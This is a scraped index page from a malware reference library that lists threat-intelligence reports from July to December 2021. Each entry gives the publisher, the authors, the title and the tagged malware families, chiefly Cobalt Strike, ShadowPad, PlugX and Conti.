⋅
BlakeCobalt Strike DFIR: Listening to the Pipes Cobalt Strike
×Select Content2021-12-28
⋅
Morphus Labs
⋅
Renato MarinhoAttackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons Cobalt Strike
×Select Content2021-12-22
⋅
Telsy
⋅
Telsy Research TeamPhishing Campaign targeting citizens abroad using COVID-19 theme lures Cobalt Strike
×Select Content2021-12-17
⋅
FBI
⋅
FBIAC-000159-MW: APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central (CVE-2021-44515) ShadowPad
×Select Content2021-12-16
⋅
TEAMT5
⋅
Aragorn Tseng,
Charles Li,
Peter Syu,
Tom LaiWinnti is Coming - Evolution after Prosecution Cobalt Strike
FishMaster
FunnySwitch
HIGHNOON
ShadowPad
Spyder
×Select Content2021-12-16
⋅
Red Canary
⋅
The Red Canary TeamIntelligence Insights: December 2021 Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-12-10
⋅
Accenture
⋅
AccentureKarakurt rises from its lair Cobalt Strike
Karakurt
×Select Content2021-12-08
⋅
PWC UK
⋅
Adam PrescottChasing Shadows: A deep dive into the latest obfuscation methods being used by ShadowPad ShadowPad
Earth Lusca
×Select Content2021-12-07
⋅
Bleeping Computer
⋅
Lawrence AbramsEmotet now drops Cobalt Strike, fast forwards ransomware attacks Cobalt Strike
Emotet
×Select Content2021-12-06
⋅
CERT-FR
⋅
CERT-FRPhishing campaigns by the Nobelium intrusion set Cobalt Strike
×Select Content2021-12-06
⋅
Mandiant
⋅
Ashraf Abdalhalim,
Ben Read,
Doug Bienstock,
Gabriella Roncone,
Jonathan Leathery,
Josh Madeley,
Juraj Sucik,
Luis Rocha,
Luke Jenkins,
Manfred Erjak,
Marius Fodoreanu,
Microsoft Detection and Response Team (DART),
Microsoft Threat Intelligence Center (MSTIC),
Mitchell Clarke,
Parnian Najafi,
Sarah Hawley,
Wojciech LedzionSuspected Russian Activity Targeting Government and Business Entities Around the Globe (UNC2452) Cobalt Strike
CryptBot
×Select Content2021-12-02
⋅
CERT-FR
⋅
CERT-FRPhishing Campaigns by the Nobelium Intrusion Set Cobalt Strike
×Select Content2021-12-01
⋅
ESET Research
⋅
Alexis Dorais-Joncas,
Facundo MuñozJumping the air gap: 15 years of nation‑state effort Agent.BTZ
Fanny
Flame
Gauss
PlugX
Ramsay
Retro
Stuxnet
USBCulprit
USBferry
×Select Content2021-11-30
⋅
Symantec
⋅
Symantec Threat Hunter TeamYanluowang: Further Insights on New Ransomware Threat BazarBackdoor
Cobalt Strike
FiveHands
×Select Content2021-11-29
⋅
The DFIR Report
⋅
The DFIR ReportCONTInuing the Bazar Ransomware Story BazarBackdoor
Cobalt Strike
Conti
×Select Content2021-11-29
⋅
Mandiant
⋅
Brandan Schondorfer,
Tyler McLellanKitten.gif: Meet the Sabbath Ransomware Affiliate Program, Again Cobalt Strike
ROLLCOAST
×Select Content2021-11-19
⋅
Trend Micro
⋅
Abdelrhman Sharshar,
Mohamed Fahmy,
Sherif MagdySquirrelwaffle Exploits ProxyShell and ProxyLogon to Hijack Email Chains Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-11-19
⋅
insomniacs(Medium)
⋅
Asuna AmawakaIt’s a BEE! It’s a… no, it’s ShadowPad. ShadowPad
×Select Content2021-11-18
⋅
Cisco
⋅
Josh PyorreBlackMatter, LockBit, and THOR BlackMatter
LockBit
PlugX
×Select Content2021-11-17
⋅
nviso
⋅
Didier StevensCobalt Strike: Decrypting Obfuscated Traffic – Part 4 Cobalt Strike
×Select Content2021-11-17
⋅
Black Hills Information Security
⋅
Kyle AveryDNS Over HTTPS for Cobalt Strike Cobalt Strike
×Select Content2021-11-17
⋅
Twitter (@Unit42_Intel)
⋅
Unit 42Tweet on Matanbuchus Loader used to deliver Qakbot (tag obama128b) and follow-up CobaltStrike Cobalt Strike
QakBot
×Select Content2021-11-17
⋅
Trend Micro
⋅
Abdelrhman Sharshar,
Mohamed Fahmy,
Ryan Maglaque,
Sherif MagdyAnalyzing ProxyShell-related Incidents via Trend Micro Managed XDR Cobalt Strike
Cotx RAT
×Select Content2021-11-16
⋅
Cisco
⋅
Asheer Malhotra,
Chetan Raghuprasad,
Vanja SvajcerAttackers use domain fronting technique to target Myanmar with Cobalt Strike Cobalt Strike
×Select Content2021-11-16
⋅
IronNet
⋅
IronNet Threat Research,
Joey Fitzpatrick,
Morgan Demboski,
Peter RydzynskiHow IronNet's Behavioral Analytics Detect REvil and Conti Ransomware Cobalt Strike
Conti
IcedID
REvil
×Select Content2021-11-16
⋅
Blackberry
⋅
Dean Given,
Eoin Wickens,
Jim Simpson,
Marta Janus,
T.J. O'Leary,
Tom BonnerFinding Beacons in the dark Cobalt Strike
×Select Content2021-11-15
⋅
TRUESEC
⋅
Fabio ViggianiProxyShell, QBot, and Conti Ransomware Combined in a Series of Cyberattacks Cobalt Strike
Conti
QakBot
×Select Content2021-11-13
⋅
Just Still
⋅
Still HsuThreat Spotlight - Domain Fronting Cobalt Strike
×Select Content2021-11-12
⋅
Malwarebytes
⋅
Hossein JaziA multi-stage PowerShell based attack targets Kazakhstan Cobalt Strike
×Select Content2021-11-11
⋅
Cynet
⋅
Max MalyutinA Duck Nightmare Quakbot Strikes with QuakNightmare Exploitation Cobalt Strike
QakBot
×Select Content2021-11-10
⋅
AT&T
⋅
Josh GomezStories from the SOC - Powershell, Proxyshell, Conti TTPs OH MY! Cobalt Strike
Conti
×Select Content2021-11-10
⋅
Sekoia
⋅
Cyber Threat Intelligence teamWalking on APT31 infrastructure footprints Rekoobe
Unidentified ELF 004
Cobalt Strike
×Select Content2021-11-09
⋅
Cybereason
⋅
Aleksandar Milenkoski,
Eli SalemTHREAT ANALYSIS REPORT: From Shatak Emails to the Conti Ransomware Cobalt Strike
Conti
×Select Content2021-11-05
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamHunter Becomes Hunted: Zebra2104 Hides a Herd of Malware Cobalt Strike
DoppelDridex
Mount Locker
Phobos
StrongPity
×Select Content2021-11-05
⋅
Twitter (@Unit42_Intel)
⋅
Unit 42Tweet on TA551 (Shathak) BazarLoader infection with CobaltStrike and DarkVNC drops BazarBackdoor
Cobalt Strike
×Select Content2021-11-04
⋅
Youtube (Virus Bulletin)
⋅
Joey Chen,
Yi-Jhen HsiehShadowPad: the masterpiece of privately sold malware in Chinese espionage PlugX
ShadowPad
×Select Content2021-11-03
⋅
Cisco Talos
⋅
Caitlin Huey,
Chetan Raghuprasad,
Vanja SvajcerMicrosoft Exchange vulnerabilities exploited once again for ransomware, this time with Babuk Babuk
CHINACHOPPER
×Select Content2021-11-03
⋅
Didier Stevens
⋅
Didier StevensNew Tool: cs-extract-key.py Cobalt Strike
×Select Content2021-11-03
⋅
nviso
⋅
Didier StevensCobalt Strike: Using Process Memory To Decrypt Traffic – Part 3 Cobalt Strike
×Select Content2021-11-02
⋅
Intel 471
⋅
Intel 471Cybercrime underground flush with shipping companies’ credentials Cobalt Strike
Conti
×Select Content2021-11-02
⋅
unh4ck
⋅
Cyb3rSn0rlaxDetecting CONTI CobaltStrike Lateral Movement Techniques - Part 2 Cobalt Strike
Conti
×Select Content2021-11-02
⋅
boschko.ca blog
⋅
Olivier LaflammeCobalt Strike Process Injection Cobalt Strike
×Select Content2021-11-01
⋅
The DFIR Report
⋅
@iiamaleks,
@samaritan_oFrom Zero to Domain Admin Cobalt Strike
Hancitor
×Select Content2021-11-01
⋅
Accenture
⋅
Curt Wilson,
Heather Larrieu,
Katrina HillDiving into double extortion campaigns Cobalt Strike
MimiKatz
×Select Content2021-10-29
⋅
Europol
⋅
Europol12 targeted for involvement in ransomware attacks against critical infrastructure Cobalt Strike
Dharma
LockerGoga
MegaCortex
TrickBot
×Select Content2021-10-29
⋅
⋅
Національна поліція України
⋅
Національна поліція УкраїниCyberpolice exposes transnational criminal group in causing $ 120 million in damage to foreign companies Cobalt Strike
Dharma
LockerGoga
MegaCortex
TrickBot
×Select Content2021-10-27
⋅
nviso
⋅
Didier StevensCobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2 Cobalt Strike
×Select Content2021-10-26
⋅
unh4ck
⋅
Hamza OUADIADetecting CONTI CobaltStrike Lateral Movement Techniques - Part 1 Cobalt Strike
Conti
×Select Content2021-10-26
⋅
Kaspersky
⋅
Kaspersky Lab ICS CERTAPT attacks on industrial organizations in H1 2021 8.t Dropper
AllaKore
AsyncRAT
GoldMax
LimeRAT
NjRAT
NoxPlayer
Raindrop
ReverseRAT
ShadowPad
Zebrocy
×Select Content2021-10-26
⋅
Cisco Talos
⋅
Edmund Brumaghin,
Mariano Graziano,
Nick MavisSQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-10-26
⋅
ANSSIIdentification of a new cyber criminal group: Lockean Cobalt Strike
DoppelPaymer
Egregor
Maze
PwndLocker
QakBot
REvil
×Select Content2021-10-21
⋅
CrowdStrike
⋅
Alex Clinton,
Tasha RobinsonStopping GRACEFUL SPIDER: Falcon Complete’s Fast Response to Recent SolarWinds Serv-U Exploit Campaign Cobalt Strike
FlawedGrace
TinyMet
×Select Content2021-10-21
⋅
nviso
⋅
Didier StevensCobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1 Cobalt Strike
×Select Content2021-10-18
⋅
The DFIR Report
⋅
The DFIR ReportIcedID to XingLocker Ransomware in 24 hours Cobalt Strike
IcedID
Mount Locker
×Select Content2021-10-18
⋅
NortonLifeLock
⋅
Norton LabsOperation Exorcist - 7 Years of Targeted Attacks against the Roman Catholic Church NewBounce
PlugX
Zupdax
×Select Content2021-10-18
⋅
Symantec
⋅
Threat Hunter TeamHarvester: Nation-state-backed group uses new toolset to target victims in South Asia Cobalt Strike
Graphon
×Select Content2021-10-18
⋅
paloalto Netoworks: Unit42
⋅
Brad DuncanCase Study: From BazarLoader to Network Reconnaissance BazarBackdoor
Cobalt Strike
×Select Content2021-10-14
⋅
Medium walmartglobaltech
⋅
Jason ReavesInvestigation into the state of NIM malware Part 2 Cobalt Strike
NimGrabber
Nimrev
Unidentified 088 (Nim Ransomware)
×Select Content2021-10-13
⋅
Blackberry
⋅
BlackBerry Research & Intelligence TeamBlackBerry Shines Spotlight on Evolving Cobalt Strike Threat in New Book Cobalt Strike
×Select Content2021-10-12
⋅
Mandiant
⋅
Alyssa RahmanDefining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis Cobalt Strike
×Select Content2021-10-11
⋅
Accenture
⋅
Accenture Cyber Threat IntelligenceMoving Left of the Ransomware Boom REvil
Cobalt Strike
MimiKatz
RagnarLocker
REvil
×Select Content2021-10-08
⋅
0ffset Blog
⋅
Chuong DongSQUIRRELWAFFLE – Analysing The Main Loader Cobalt Strike
Squirrelwaffle
×Select Content2021-10-07
⋅
Netskope
⋅
Ghanashyam Satpathy,
Gustavo PalazoloSquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-10-07
⋅
Mandiant
⋅
Mandiant Research TeamFIN12 Group Profile: FIN12 Priotizes Speed to Deploy Ransomware Aginst High-Value Targets Cobalt Strike
Empire Downloader
TrickBot
×Select Content2021-10-06
⋅
Blackberry
⋅
Blackberry ResearchFinding Beacons in the Dark Cobalt Strike
×Select Content2021-10-05
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamDrawing a Dragon: Connecting the Dots to Find APT41 Cobalt Strike
Ghost RAT
×Select Content2021-10-04
⋅
Sophos
⋅
Chaitanya Ghorpade,
Kajal Katiyar,
Krisztián Diriczi,
Rahil Shah,
Sean Gallagher,
Vikas SinghAtom Silo ransomware actors use Confluence exploit, DLL side-load for stealthy attack ATOMSILO
Cobalt Strike
×Select Content2021-10-04
⋅
The DFIR Report
⋅
The DFIR ReportBazarLoader and the Conti Leaks BazarBackdoor
Cobalt Strike
Conti
×Select Content2021-10-03
⋅
Github (0xjxd)
⋅
Joel DönneSquirrelWaffle - From Maldoc to Cobalt Strike Cobalt Strike
Squirrelwaffle
×Select Content2021-10-01
⋅
0ffset Blog
⋅
Chuong DongSQUIRRELWAFFLE – Analysing the Custom Packer Cobalt Strike
Squirrelwaffle
×Select Content2021-09-30
⋅
PTSecurity
⋅
PT ESC Threat IntelligenceMasters of Mimicry: new APT group ChamelGang and its arsenal Cobalt Strike
×Select Content2021-09-30
⋅
PT Expert Security CenterMasters of Mimicry: new APT group ChamelGang and its arsenal Cobalt Strike
×Select Content2021-09-30
⋅
CrowdStrike
⋅
Falcon OverWatch TeamHunting for the Confluence Exploitation: When Falcon OverWatch Becomes the First Line of Defense Cobalt Strike
×Select Content2021-09-29
⋅
Advanced Intelligence
⋅
Vitali Kremez,
Yelisey BoguslavskiyBackup “Removal” Solutions - From Conti Ransomware With Love Cobalt Strike
Conti
×Select Content2021-09-29
⋅
Malware Traffic Analysis
⋅
Brad Duncan2021-09-29 (Wednesday) - Hancitor with Cobalt Strike Cobalt Strike
Hancitor
×Select Content2021-09-29
⋅
Malware Traffic Analysis
⋅
Brad DuncanHancitor with Cobalt Strike Cobalt Strike
Hancitor
×Select Content2021-09-28
⋅
Recorded Future
⋅
Insikt Group®4 Chinese APT Groups Identified Targeting Mail Server of Afghan Telecommunications Firm Roshan PlugX
Winnti
×Select Content2021-09-28
⋅
Zscaler
⋅
Avinash Kumar,
Brett Stone-GrossSquirrelwaffle: New Loader Delivering Cobalt Strike Cobalt Strike
Squirrelwaffle
×Select Content2021-09-27
⋅
Cynet
⋅
Max MalyutinA Virtual Baffle to Battle Squirrelwaffle Cobalt Strike
Squirrelwaffle
×Select Content2021-09-26
⋅
NSFOCUS
⋅
Jie JiInsights into Ransomware Spread Using Exchange 1-Day Vulnerabilities 1-2 Cobalt Strike
LockFile
×Select Content2021-09-24
⋅
Trend Micro
⋅
Warren Sto.TomasExamining the Cring Ransomware Techniques Cobalt Strike
Cring
MimiKatz
×Select Content2021-09-22
⋅
CISA
⋅
US-CERTAlert (AA21-265A) Conti Ransomware Cobalt Strike
Conti
×Select Content2021-09-21
⋅
Medium elis531989
⋅
Eli SalemThe Squirrel Strikes Back: Analysis of the newly emerged cobalt-strike loader “SquirrelWaffle” Cobalt Strike
Squirrelwaffle
×Select Content2021-09-21
⋅
skyblue.team blog
⋅
skyblue teamScanning VirusTotal's firehose Cobalt Strike
×Select Content2021-09-21
⋅
GuidePoint Security
⋅
Drew SchmittA Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike Cobalt Strike
×Select Content2021-09-21
⋅
Sophos
⋅
Andrew Brandt,
Chaitanya Ghorpade,
Krisztián Diriczi,
Shefali Gupta,
Vikas SinghCring ransomware group exploits ancient ColdFusion server Cobalt Strike
Cring
×Select Content2021-09-21
⋅
eSentire
⋅
eSentireRansomware Hackers Attack a Top Safety Testing Org. Using Tactics and Techniques Borrowed from Chinese Espionage Groups Cobalt Strike
MimiKatz
UNC215
×Select Content2021-09-17
⋅
CrowdStrike
⋅
Falcon OverWatch TeamFalcon OverWatch Hunts Down Adversaries Where They Hide BazarBackdoor
Cobalt Strike
×Select Content2021-09-17
⋅
Medium inteloperator
⋅
Intel OperatorThe default: 63 6f 62 61 6c 74 strike Cobalt Strike
×Select Content2021-09-17
⋅
Malware Traffic Analysis
⋅
Brad Duncan2021-09-17 - SQUIRRELWAFFLE Loader with Cobalt Strike Cobalt Strike
Squirrelwaffle
×Select Content2021-09-16
⋅
Twitter (@GossiTheDog)
⋅
Kevin BeaumontTweet on some unknown threat actor dropping Mgbot, custom IIS modular backdoor and cobalstrike using exploiting ProxyShell Cobalt Strike
MgBot
×Select Content2021-09-16
⋅
Medium Shabarkin
⋅
Pavel ShabarkinPointer: Hunting Cobalt Strike globally Cobalt Strike
×Select Content2021-09-16
⋅
RiskIQ
⋅
RiskIQUntangling the Spider Web: The Curious Connection Between WIZARD SPIDER’s Ransomware Infrastructure and a Windows Zero-Day Exploit Cobalt Strike
Ryuk
×Select Content2021-09-15
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence Team,
Microsoft Threat Intelligence Center (MSTIC)Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability Cobalt Strike
×Select Content2021-09-14
⋅
McAfee
⋅
Christiaan BeekOperation ‘Harvest’: A Deep Dive into a Long-term Campaign MimiKatz
PlugX
Winnti
×Select Content2021-09-14
⋅
Recorded Future
⋅
Insikt Group®Full-Spectrum Cobalt Strike Detection Cobalt Strike
×Select Content2021-09-13
⋅
The DFIR Report
⋅
The DFIR ReportBazarLoader to Conti Ransomware in 32 Hours BazarBackdoor
Cobalt Strike
Conti
×Select Content2021-09-12
⋅
Medium michaelkoczwara
⋅
Michael KoczwaraMapping and Pivoting from Cobalt Strike C2 Infrastructure Attributed to CVE-2021-40444 Cobalt Strike
×Select Content2021-09-10
⋅
Gigamon
⋅
Joe SlowikRendering Threats: A Network Perspective BumbleBee
Cobalt Strike
×Select Content2021-09-10
⋅
The Record
⋅
Catalin CimpanuIndonesian intelligence agency compromised in suspected Chinese hack PlugX
×Select Content2021-09-09
⋅
Trend Micro
⋅
Trend MicroRemote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs BumbleBee
Cobalt Strike
×Select Content2021-09-09
⋅
Symantec
⋅
Threat Hunter TeamGrayfly: Chinese Threat Actor Uses Newly-discovered Sidewalk Malware CROSSWALK
MimiKatz
SideWalk
×Select Content2021-09-08
⋅
Arash's Blog
⋅
Arash ParsaHook Heaps and Live Free Cobalt Strike
×Select Content2021-09-07
⋅
Medium michaelkoczwara
⋅
Michael KoczwaraCobalt Strike C2 Hunting with Shodan Cobalt Strike
×Select Content2021-09-06
⋅
kienmanowar Blog
⋅
m4n0w4rQuick analysis CobaltStrike loader and shellcode Cobalt Strike
×Select Content2021-09-03
⋅
FireEye
⋅
Adrian Sanchez Hernandez,
Alex Pennino,
Andrew Rector,
Brendan McKeague,
Govand Sinjari,
Harris Ansari,
John Wolfram,
Joshua Goddard,
Yash GuptaPST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers CHINACHOPPER
HTran
×Select Content2021-09-03
⋅
Sophos
⋅
Anand Ajjan,
Andrew Ludgate,
Gabor Szappanos,
Peter Mackenzie,
Sean Gallagher,
Sergio Bestulic,
Syed ZaidiConti affiliates use ProxyShell Exchange exploit in ransomware attacks Cobalt Strike
Conti
×Select Content2021-09-03
⋅
Trend Micro
⋅
Mohamad MokbelThe State of SSL/TLS Certificate Usage in Malware C&C Communications AdWind
ostap
AsyncRAT
BazarBackdoor
BitRAT
Buer
Chthonic
CloudEyE
Cobalt Strike
DCRat
Dridex
FindPOS
GootKit
Gozi
IcedID
ISFB
Nanocore RAT
Orcus RAT
PandaBanker
Qadars
QakBot
Quasar RAT
Rockloader
ServHelper
Shifu
SManager
TorrentLocker
TrickBot
Vawtrak
Zeus
Zloader
×Select Content2021-09-02
⋅
Medium michaelkoczwara
⋅
Michael KoczwaraCobalt Strike PowerShell Payload Analysis Cobalt Strike
×Select Content2021-09-02
⋅
Twitter (@th3_protoCOL)
⋅
Colin,
GaborSzappanosTweet on Confluence Server exploitation (CVE-2021-26084) in the wild and cobaltsrike activity (mentioned in replies by GaborSzappanos) Cobalt Strike
×Select Content2021-09-01
⋅
YouTube (Black Hat)
⋅
Aragorn Tseng,
Charles LiMem2Img: Memory-Resident Malware Detection via Convolution Neural Network Cobalt Strike
PlugX
Waterbear
×Select Content2021-09-01
⋅
YouTube (Hack In The Box Security Conference)
⋅
Joey Chen,
Yi-Jhen HsiehSHADOWPAD: Chinese Espionage Malware-as-a-Service PlugX
ShadowPad
×Select Content2021-08-31
⋅
BreakPoint Labs
⋅
BreakPoint LabsCobalt Strike and Ransomware – Tracking An Effective Ransomware Campaign Cobalt Strike
×Select Content2021-08-30
⋅
⋅
Qianxin
⋅
Red Raindrop TeamOperation (Thủy Tinh) OceanStorm: The evil lotus hidden under the abyss Cobalt Strike
MimiKatz
×Select Content2021-08-29
⋅
The DFIR Report
⋅
The DFIR ReportCobalt Strike, a Defender’s Guide Cobalt Strike
×Select Content2021-08-27
⋅
Aon
⋅
Aon’s Cyber Labs,
Noah RubinCobalt Strike Configuration Extractor and Parser Cobalt Strike
×Select Content2021-08-27
⋅
Morphisec
⋅
Morphisec LabsProxyShell Exchange Exploitation Now Leads To An Increasing Amount Of Cobaltstrike Backdoors Cobalt Strike
×Select Content2021-08-25
⋅
Trend Micro
⋅
Hara Hiroaki,
Ted LeeEarth Baku An APT Group Targeting Indo-Pacific Countries With New Stealth Loaders and Backdoor Cobalt Strike
SideWalk
×Select Content2021-08-24
⋅
ESET Research
⋅
Mathieu Tartare,
Thibaut PassillyThe SideWalk may be as dangerous as the CROSSWALK Cobalt Strike
CROSSWALK
SideWalk
SparklingGoblin
×Select Content2021-08-23
⋅
Youtube (SANS Digital Forensics and Incident Response)
⋅
Chad TilburyKeynote: Cobalt Strike Threat Hunting Cobalt Strike
×Select Content2021-08-23
⋅
FBI
⋅
FBIIndicators of Compromise Associated with OnePercent Group Ransomware Cobalt Strike
MimiKatz
×Select Content2021-08-23
⋅
SentinelOne
⋅
Joey Chen,
Yi-Jhen HsiehShadowPad: the Masterpiece of Privately Sold Malware in Chinese Espionage PlugX
ShadowPad
×Select Content2021-08-19
⋅
Sentinel LABS
⋅
Joey Chen,
Yi-Jhen HsiehShadowPad | A Masterpiece of Privately Sold Malware in Chinese Espionage ShadowPad
×Select Content2021-08-19
⋅
Blackberry
⋅
BlackBerry Research & Intelligence TeamBlackBerry Prevents: Threat Actor Group TA575 and Dridex Malware Cobalt Strike
Dridex
TA575
×Select Content2021-08-19
⋅
Sekoia
⋅
sekoiaAn insider insights into Conti operations – Part two Cobalt Strike
Conti
×Select Content2021-08-18
⋅
Intezer
⋅
Ryan RobinsonCobalt Strike: Detect this Persistent Threat Cobalt Strike
×Select Content2021-08-17
⋅
Advanced Intelligence
⋅
Vitali Kremez,
Yelisey BoguslavskiyHunting for Corporate Insurance Policies: Indicators of [Ransom] Exfiltration Cobalt Strike
Conti
×Select Content2021-08-17
⋅
Sekoia
⋅
sekoiaAn insider insights into Conti operations – Part one Cobalt Strike
Conti
×Select Content2021-08-17
⋅
Medium michaelkoczwara
⋅
Michael KoczwaraCobalt Strike Hunting — DLL Hijacking/Attack Analysis Cobalt Strike
×Select Content2021-08-15
⋅
Symantec
⋅
Threat Hunter TeamThe Ransomware Threat Babuk
BlackMatter
DarkSide
Avaddon
Babuk
BADHATCH
BazarBackdoor
BlackMatter
Clop
Cobalt Strike
Conti
DarkSide
DoppelPaymer
Egregor
Emotet
FiveHands
FriedEx
Hades
IcedID
LockBit
Maze
MegaCortex
MimiKatz
QakBot
RagnarLocker
REvil
Ryuk
TrickBot
WastedLocker
×Select Content2021-08-12
⋅
Sentinel LABS
⋅
SentinelLabsShadowPad: A Masterpiece of Privately Sold Malware in Chinese Espionage ShadowPad
Earth Lusca
×Select Content2021-08-11
⋅
Advanced Intelligence
⋅
Vitali KremezSecret "Backdoor" Behind Conti Ransomware Operation: Introducing Atera Agent Cobalt Strike
Conti
×Select Content2021-08-09
⋅
IstroSec
⋅
Ladislav BačoAPT Cobalt Strike Campaign targeting Slovakia (DEF CON talk) Cobalt Strike
×Select Content2021-08-05
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamDetecting Cobalt Strike: Government-Sponsored Threat Groups (APT32) Cobalt Strike
×Select Content2021-08-05
⋅
Red Canary
⋅
Brian Donohue,
Dan Cotton,
Tony LambertWhen Dridex and Cobalt Strike give you Grief Cobalt Strike
DoppelDridex
DoppelPaymer
×Select Content2021-08-04
⋅
Sentinel LABS
⋅
Gal KristalHotcobalt – New Cobalt Strike DoS Vulnerability That Lets You Halt Operations Cobalt Strike
×Select Content2021-08-04
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamDetecting Cobalt Strike: Cybercrime Attacks (GOLD LAGOON) Cobalt Strike
×Select Content2021-08-04
⋅
CrowdStrike
⋅
CrowdStrike Intelligence Team,
CrowdStrike IR,
Falcon OverWatch TeamPROPHET SPIDER Exploits Oracle WebLogic to Facilitate Ransomware Activity Cobalt Strike
Egregor
Mount Locker
Prophet Spider
×Select Content2021-08-03
⋅
Cybereason
⋅
Assaf Dahan,
Daniel Frank,
Lior Rochberger,
Tom FaktermanDeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos CHINACHOPPER
Cobalt Strike
MimiKatz
Nebulae
×Select Content2021-08-02
⋅
Youtube (Forschungsinstitut Cyber Defense)
⋅
Alexander Rausch,
Konstantin KlingerThe CODE 2021: Workshop presentation and demonstration about CobaltStrike Cobalt Strike
×Select Content2021-08-01
⋅
The DFIR Report
⋅
The DFIR ReportBazarCall to Conti Ransomware via Trickbot and Cobalt Strike BazarBackdoor
Cobalt Strike
Conti
TrickBot
×Select Content2021-07-30
⋅
Twitter (@Unit42_Intel)
⋅
Unit 42Tweet on BazarLoader infection leading to cobaltstrike and Powershell script file for PrintNightmare vulnerability BazarBackdoor
Cobalt Strike
×Select Content2021-07-29
⋅
Rasta Mouse
⋅
Rasta MouseNTLM Relaying via Cobalt Strike Cobalt Strike
×Select Content2021-07-29
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence TeamBazaCall: Phony call centers lead to exfiltration and ransomware BazarBackdoor
Cobalt Strike
×Select Content2021-07-27
⋅
Blackberry
⋅
BlackBerry Research & Intelligence TeamOld Dogs New Tricks: Attackers Adopt Exotic Programming Languages elf.wellmess
ElectroRAT
BazarNimrod
Buer
Cobalt Strike
Remcos
Snake
TeleBot
WellMess
Zebrocy
×Select Content2021-07-27
⋅
Palo Alto Networks Unit 42
⋅
Alex Hinchliffe,
Mike HarbisonTHOR: Previously Unseen PlugX Variant Deployed During Microsoft Exchange Server Attacks by PKPLUG Group PlugX
×Select Content2021-07-25
⋅
Medium svch0st
⋅
svch0stGuide to Named Pipes and Hunting for Cobalt Strike Pipes Cobalt Strike
×Select Content2021-07-22
⋅
Medium michaelkoczwara
⋅
Michael KoczwaraCobalt Strike Hunting — simple PCAP and Beacon Analysis Cobalt Strike
×Select Content2021-07-21
⋅
Bitdefender
⋅
Bogdan Botezatu,
Victor VrabieLuminousMoth – PlugX, File Exfiltration and Persistence Revisited PlugX
×Select Content2021-07-20
⋅
Secureworks
⋅
Counter Threat Unit ResearchTeamOngoing Campaign Leveraging Exchange Vulnerability Potentially Linked to Iran CHINACHOPPER
MimiKatz
RGDoor
×Select Content2021-07-19
⋅
The DFIR Report
⋅
The DFIR ReportIcedID and Cobalt Strike vs Antivirus Cobalt Strike
IcedID
×Select Content2021-07-14
⋅
⋅
Clement Lecigne,
Google Threat Analysis Group,
Maddie StoneHow We Protect Users From 0-Day Attacks (CVE-2021-21166, CVE-2021-30551, CVE-2021-33742, CVE-2021-1879) Cobalt Strike
×Select Content2021-07-14
⋅
MDSec
⋅
Chris BasnettInvestigating a Suspicious Service Cobalt Strike
×Select Content2021-07-14
⋅
Kaspersky
⋅
Aseel Kayal,
Mark Lechtik,
Paul RascagnèresLuminousMoth APT: Sweeping attacks for the chosen few Cobalt Strike
×Select Content2021-07-13
⋅
YouTube ( Matt Soseman)
⋅
Matt SosemanSolarwinds and SUNBURST attacks compromised my lab! Cobalt Strike
Raindrop
SUNBURST
TEARDROP
×Select Content2021-07-09
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanHancitor tries XLL as initial malware file Cobalt Strike
Hancitor
×Select Content2021-07-08
⋅
Avast Decoded
⋅
Threat Intelligence TeamDecoding Cobalt Strike: Understanding Payloads Cobalt Strike
Empire Downloader
×Select Content2021-07-08
⋅
⋅
PTSecurity
⋅
Denis KuvshinovHow winnti APT grouping works Korlia
ShadowPad
Winnti
×Select Content2021-07-08
⋅
Recorded Future
⋅
Insikt GroupChinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling Cobalt Strike
Earth Lusca
×Select Content2021-07-08
⋅
Recorded Future
⋅
Insikt Group®Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling ShadowPad
Spyder
Winnti
×Select Content2021-07-08
⋅
⋅
YouTube (PT Product Update)
⋅
Denis KuvshinovHow winnti APT grouping works Korlia
ShadowPad
Winnti
×Select Content2021-07-07
⋅
Trustwave
⋅
Nikita Kazymirskyi,
Rodel MendrezDiving Deeper Into the Kaseya VSA Attack: REvil Returns and Other Hackers Are Riding Their Coattails Cobalt Strike
REvil
×Select Content2021-07-07
⋅
Trend Micro
⋅
Gloria Chen,
Jaromír Hořejší,
Joseph C Chen,
Kenney LuBIOPASS RAT: New Malware Sniffs Victims via Live Streaming BIOPASS
Cobalt Strike
Derusbi
×Select Content2021-07-07
⋅
McAfee
⋅
McAfee LabsRyuk Ransomware Now Targeting Webservers Cobalt Strike
Ryuk
×Select Content2021-07-06
⋅
Twitter (@MBThreatIntel)
⋅
Malwarebytes Threat IntelligenceTweet on a malspam campaign that is taking advantage of Kaseya VSA ransomware attack to drop CobaltStrike Cobalt Strike
×Select Content2021-07-05
⋅
Trend Micro
⋅
Abraham Camba,
Buddy Tancio,
Catherine Loveria,
Ryan MaglaqueTracking Cobalt Strike: A Trend Micro Vision One Investigation Cobalt Strike
×Select Content2021-07-03
⋅
Medium AK1001
⋅
AK1001Analyzing Cobalt Strike PowerShell Payload Cobalt Strike
×Select Content2021-07-02
⋅
MalwareBookReports
⋅
muziSkip the Middleman: Dridex Document to Cobalt Strike Cobalt Strike
Dridex
×Select Content2021-07-01
⋅
The Record
⋅
